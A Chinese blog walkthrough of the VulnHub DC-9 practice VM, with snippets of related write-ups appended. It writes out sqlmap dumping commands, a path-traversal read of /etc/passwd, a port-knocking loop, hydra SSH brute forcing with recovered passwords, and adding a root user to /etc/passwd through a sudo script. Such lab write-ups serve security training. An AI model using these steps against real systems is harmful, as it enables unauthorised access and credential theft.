vulnhub-dc9

最新推荐文章于 2024-03-14 02:19:26 发布
最新推荐文章于 2024-03-14 02:19:26 发布
阅读量289 收藏
点赞数
分类专栏: 内网 vulhub 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_55654781/article/details/127122736
版权

靶机地址

https://www.vulnhub.com/?q=dc-

打开靶机,设置为同一种nat模式

kali 信息收集主机发现 ,并扫描该主机ip

arp-scan -l
nmap -p- -sV 192.168.1.201

在这里插入图片描述

访问192.168.1.201,在search界面可尝试sql注入,用burp抓包,尝试注入

在这里插入图片描述

使用sqlmap注入(路径自定义)

附在线破解网站:https://hashes.com/en/decrypt/hash

python sqlmap.py -r sql.txt --dbs
python sqlmap.py -r sql.txt -D users --tables
python sqlmap.py -r sql.txt -D users -T UserDetails --columns
python sqlmap.py -r sql.txt -D users -T UserDetails -C "username,password" --dump

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

无法登录,重新查找其他数据库,查找到admin transorbital1

python sqlmap.py -r sql.txt ‐D Staff ‐T Users ‐C Username,Password ‐‐dump

在这里插入图片描述

登录页面后,发现可能为文件包含漏洞,?file=…/…/…/…/etc/passwd 无有效信息,

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-1LBqgTGM-1664518285510)(../../../../img/dc9/7.png)]

查看knock配置文件?file=…/…/…/…/etc/knockd.conf

关于knock 讲解链接https://blog.youkuaiyun.com/nzjdsds/article/details/112476120
在这里插入图片描述

进行敲击,发现ssh可以连接

for x in 7469 8475 9842;do nmap -Pn --max-retries 0 -p $x 192.168.1.201;done

在这里插入图片描述

之前的用户密码分别保存,hydra爆破

hydra -L /root/桌面/1.txt -P /root/桌面/2.txt  ssh://192.168.1.201

在这里插入图片描述

通过ssh登录在,janitor的家目录存在secrets-for-putin的文件中存在密码

在这里插入图片描述

重新爆破

[22][ssh] host: 192.168.1.201   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.1.201   login: janitor   password: Ilovepeepee
[22][ssh] host: 192.168.1.201   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.1.201   login: fredf   password: B4-Tru3-001

在这里插入图片描述

ssh登录fredf,查看有root权限的文件,后发现test可以执行,执行

在上级目录查看test.py

在这里插入图片描述
在这里插入图片描述

脚本内容为将文件内容添加到另外一个文件内容

可以添加一个新的用户到/etc/passwd,然后新添加的用户登陆

Openssl来对密码进行加密,在进行编辑输入到/tmp/new-passwd,最后登录dc9,查看flag

fredf@dc-9:/opt/devstuff/dist/test$ openssl passwd -1 -salt dc9 123456
$1$dc9$3Qf9B8VT49B741CMh3R4m1
fredf@dc-9:/opt/devstuff/dist/test$ echo 'dc9:$1$dc9$3Qf9B8VT49B741CMh3R4m1
fredf@dc-9:/opt/devstuff/dist/test$ echo 'dc9:$1$dc9$3Qf9B8VT49B741CMh3R4m1:0:0:root:/bin/bash' >> /tmp/dc9
fredf@dc-9:/opt/devstuff/dist/test$ sudo ./test /tmp/dc9 /etc/passwd
fredf@dc-9:/opt/devstuff/dist/test$ su dc9

在这里插入图片描述

Vulnhub靶场渗透测试系列DC-9(knockd敲门服务)
qq_45722813的博客
12-12 6873
Vulnhub靶场渗透测试系列DC-9 靶机下载地址:https://www.vulnhub.com/entry/dc-9,412/
Vulnhub-DC 7-9 提权、端口敲门
2301_80115097的博客
04-28 1221
Vulnhub是一个提供了很多漏洞环境的靶场平台,其中的环境基本上都是做好的虚拟机镜像文件,需要使用VMware或者是VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚拟机到获取操作系统的root权限和查看flag。靶场部署Vulnhub官网:https://www.vulnhub.com下载地址:https://www.vulnhub.com/entry/dc-8,367/直接从官网下载做好的虚拟机镜像文件(我下载的Mirror版本);
Vulnhub DC-9
Pai_Space
04-11 3306
明确:《中华人民共和国网络安全法》 Description DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. The ultimate goal of this challenge is to get root and to read the one and only flag. Linux skill..
Vulnhub-DC-9
KAKA的博客
07-04 559
nmap 扫描获取目标 IP 地址 nmap 扫描目标 IP 地址获得开放端口: 这里仔细看下,可以看到 22 是 filtered,80 开放,22 是被过滤这就很奇怪,针对这个,首先你得看下这篇文章: 保护 SSH 的三把锁 不想看的看下边:(强推看下原文) 简单总结下就是:1.换端口 2.指定用户登入 3.敲门服务 这里重点说下敲门服务就是,你想打开 ssh 大门,打开大门方式是念咒语,你得先去打开其它几扇门才可以打开 SSH 服务,敲门服务必须安装敲门守护进程 knockd,敲门配置在 /etc
vulnhubDC9
qq_54030686的博客
06-24 1126
vulnhubDC9这应该是DC系列的最后一篇,相较于其他靶机而言,会比较难一些,提权的方式也较为多样,本文参考 下面的是官方出的wp,上面为一位师傅写的,简述一些流程主机发现,端口扫描 主机开放了22和80端口,但是22端口为过滤状态,无法进行暴力破解 对80端口开放的服务进行指纹识别,这里使用whatweb,棱洞之类也可以 并未识别到网站使用的框架,只能够自己进行检测,这里使用burp和xray联合进行检测,具体操作方法这里不再进行描述, 经过检测,发现result.php界面存在sql注入,但是
Vulnhub靶机 DC-9
菜浪马废的博客
03-31 659
哇,开心了,DC系列最后一个,加油! 135是靶机 80 22端口 访问主页 bp抓了一下包,看着应该可以注入,跑一下sqlmap 列出了一堆账号密码 sqlmap -u "http://192.168.0.135/results.php" --data "search=1" --dbs sqlmap -u "http://192.168.0.135/results.php" --d...
Vulnhub - DC-1
qq_46081990的博客
03-14 489
Nmap扫描目标主机,发现开放22、80、111、40884端口,分别运行OpenSSH 6.0p1、Apache httpd 2.2.22、rpcbind 2-4服务。MSF搜索Drupal,使用payload:exploit/unix/webapp/drupal_drupalgeddon2,成功拿到Web权限www-data。查询GTFOBins得知find的SUID提权方式如下,启用一个新的root权限的bash。上传综合辅助探测脚本LinEnum.sh至目标主机/tmp目录下,给予执行权限执行。
靶机渗透-Vulnhub-DC-2
dahege666的博客
01-21 411
下载地址: 1、链接:https://pan.baidu.com/s/1cl5-9SrevaFehfS4lY4w5w 提取码:7ahw 2、http://www.five86.com/downloads/DC-2.zip 3、https://download.vulnhub.com/dc/DC-2.zip 靶机:DC2(VMware桥接) IP:192.168.88.123 攻击机:Kali(VMware桥接) IP:192.168..88.109 测试之前需要修改一下hos...
vulnhub-DC系列通关记DC1靶机渗透
qq_35258210的博客
02-07 1800
目录 flag1 信息收集 漏洞利用 后渗透 flag2 flag3 flag4 最终flag 该流程图出于:https://blog.youkuaiyun.com/weixin_44288604/article/details/108027062 本次学习参考于b站千峰机构的网络安全视频:https://www.bilibili.com/video/BV1i7411G7vm?p=268 这张流程图做得很好借来用用。如有侵权请告知删除 flag1 首先我们在启动DC1靶机后进入到系统只显示
靶机实操:vulnhub-DC3
不想当脚本小子的脚本小子
12-06 240
今天继续趁着回家来用DC练练手。照旧先是扫一下内网主机,我一般喜欢先找一下存活的主机然后再查看具体的信息,扫描到IP为192.168.249.135。只开放了80端口 访问网页长这样:发现有一个右下角forget操作,一会看看这里有没有可以操作的地方。CMS是Joomla,中间件会不会存在漏洞? 接下来常规操作。查看robots没东西,那再扫扫后台,挑几个觉得有用的打开看看。总觉得最终的落脚点会在刚才的忘记用户名和密码那里,一会看看会不会被打脸哈哈哈哈 登录界面先简单sql..
Vulnhub靶场实战---DC-9
一期一会的博客
12-23 2397
​ 0x00 环境准备 1.官网下载地址: https://www.vulnhub.com/entry/dc-9,412/ 2.下载完成之后直接导入vm,使用NAT模式连接,保持在同一网段 攻击机:kali (192.168.88.130) 靶机:DC-8 (192.168.88.132) 0x01 信息收集 老办法,使用arp-scan -l 找到目标主机,目标主机ip为192.168.88.132 查看开放端口,22端口被过滤,登录80端口查看 nmap -sV -p- -A 192.168.88.
Vulnhub靶机渗透学习——DC-9
qq_45612828的博客
07-02 3443
Vulnhub靶机渗透学习——DC-9
vulnhub靶机DC-9渗透测试
Long_gone的博客
01-21 2530
一、信息收集 首先用netdiscover确定靶机IP: 确定靶机IP为:192.168.1.109后开始扫描它的端口开放情况: namp -sV -A -p 0-65535 1192.168.1.109 发现它只开放了22和80端口,发现ssh服务被过滤掉了,这就使我们用不了ssh服务,先不管它。然后先访问一下80端口: 是一个这样的页面,其中还有4个选项,依次点开以后并没有什么发现,但...
看完这篇 教你玩转渗透测试靶机vulnhub——DC9
Aluxian_的博客
04-19 7089
Vulnhub靶机DC9渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:SQL注入:③:文件包含:④:端口敲门: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC9 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://dow
vulnhub-DC-9靶机渗透记录(适合新手详细版)
m0_62584974的博客
09-09 1461
vulnhub-DC-9靶机渗透记录,超详细,适合新手
Vulnhub靶机:DC-9渗透详细过程(DC系列完结)
IerkeU的博客
03-28 3935
信息收集 nmap -A -sV -p- -T4 192.168.132.156 目前发现只开放80端口,去web页面搜索一下 有一处后台登陆、一处搜索处 在搜索处1' or 1=1#页面返回正常,1' or 1=2#报错,BP抓包发现是POST 输出文件:sql进入kali一把梭 SQLMAP sqlmap -r sql --dbs --dump sqlmap -r sql -D users -T UserDetails -C id,username,password --dump 将admin
靶场练习第十七天~vulnhub靶场之dc-9
qq_57976347的博客
02-16 889
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:https://download.vulnhub.com/dc/DC-9.zip 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -A -p- 192.168.101.122 2.网站的信息收集 (1)靶机开放了80端口,先访问
记一次vulnhub|渗透测试 DC-9
crispr的博客
01-15 2656
vulnhub DC-9 0X01 Main Point 1.Sqlmap的基本使用 2.LFI的利用 3.Port Knocking–端口敲门服务 4.hydra的基本使用–爆破ssh 5.sudo权限的枚举 0X02 前期嗅探和端口探测 kali下使用arp-scan获取靶机IP 得到靶机IP 172.20.10.10, nmap探测靶机开放的端口服务; 靶机开放了80和22端...
vulnhub靶机DC-1
最新发布
02-08
### VulnHub DC-1 靶机 攻略 介绍 #### 下载地址 VulnHub是一个提供各种虚拟机镜像用于安全测试和学习渗透测试技巧的平台。对于DC-1靶机,可以在[VulnHub官网](https://www.vulnhub.com/)搜索并下载该靶机镜像文件。 #### 初始信息收集 在启动DC-1之后,通过网络扫描工具如`nmap`来发现开放端口和服务版本是非常重要的初步操作[^2]。这有助于了解目标系统的潜在弱点所在之处。 ```bash nmap -A <target_ip> ``` #### Web应用漏洞探测 一旦确认存在Web服务运行于特定IP地址之上,则可以采用专门针对WordPress站点的安全评估工具WPScan来进行进一步的信息挖掘工作: ```bash wpscan --url http://<target_ip>/wordpress/ ``` 此命令能够帮助识别可能存在的插件或主题中的已知漏洞,并尝试获取管理员用户名列表等有用情报[^1]。 #### 获取初始访问权限 当已经掌握了某些关于网站后台管理账号线索后(比如默认用户名),可借助Hydra这样的暴力破解程序配合常用密码字典对登录界面发起攻击以期获得合法凭证进入内部环境: ```bash hydra -L /usr/share/wordlists/usernames.txt -P /usr/share/wordlists/passwords.txt ssh://<target_ip> ``` 这里假设SSH服务对外开放并且允许远程登陆;实际过程中还需根据具体情况调整相应参数设置[^3]。 #### 提升权限至root级别 成功创建Meterpreter会话意味着获得了较为深入的目标主机控制权,在此基础上继续探索其他未授权区域直至找到可用于提升当前用户权限的方法。例如,如果遇到弱配置下的Sudoers文件或是设置了简单密码的辅助账户,都可以成为突破口之一[^5]: ```bash sudo -l # 查看是否有无需密码即可执行高权限指令的情况 whoami # 确认当前身份 su admin # 尝试切换到更高权限用户 ``` 以上就是有关如何攻克VulnHub平台上名为DC-1这一挑战性实验项目的概览描述以及部分关键技术要点提示。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值